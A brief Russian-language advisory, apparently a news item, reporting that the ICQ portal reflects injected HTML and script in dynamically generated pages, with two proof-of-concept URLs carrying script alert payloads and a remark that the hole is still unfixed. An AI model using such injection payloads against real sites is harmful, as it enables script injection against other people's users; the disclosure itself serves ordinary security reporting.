ICQ портал может включать злонамеренные метки HTML или скрипты в динамически сгенерированных страницах:

http://search.icq.com/dirsearch.adp?query=<h1>Hello!</h1><script>alert(‘hello’);</script>est&wh=is&users=1 

http://web.icq.com/foo/<script>alert(‘hello’);</script>

Уязвимость пока не устранена.

Оставить мнение